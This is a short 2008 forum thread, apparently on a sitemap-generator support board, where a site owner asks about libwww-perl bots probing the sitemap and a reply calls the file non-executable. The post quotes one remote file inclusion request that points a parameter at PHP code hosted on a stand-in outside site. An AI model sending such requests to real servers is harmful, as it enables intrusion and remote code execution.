Security: Repeated perl bot attack attempts targeting sitemap
« on: January 01, 2008, 11:16:19 PM »
Hi all.

In following my site's traffic, I've noticed persistent attack attempts by bots specifically targeting the sitemap.  The user agent is almost always libwww-perl/5.805.  The bots typically reference a php instruction that has been uploaded onto someone else's site in a text file. The code on the text file is what the bot attempts to inject into the form on the target page (i.e. the admin login).

Here is a generic example of an attempt:
   
/sitemap.xml/index.php?action=http://otherwebsite/folder/textfile.txt??

XML-SITEMAPS, of course, creates an admin login page, but not at the location of the XML file that is generated.

Are there are any known security issues with these types of attacks?
Thanks
websitebob
Re: Security: Repeated perl bot attack attempts targeting sitemap
« Reply #1 on: January 02, 2008, 06:46:26 PM »
Hello,

xml sitemap is NOT an executable page so it cannot be exploited in any way, this must be a bot script that just attempts to attach parameters to any found URL on the site.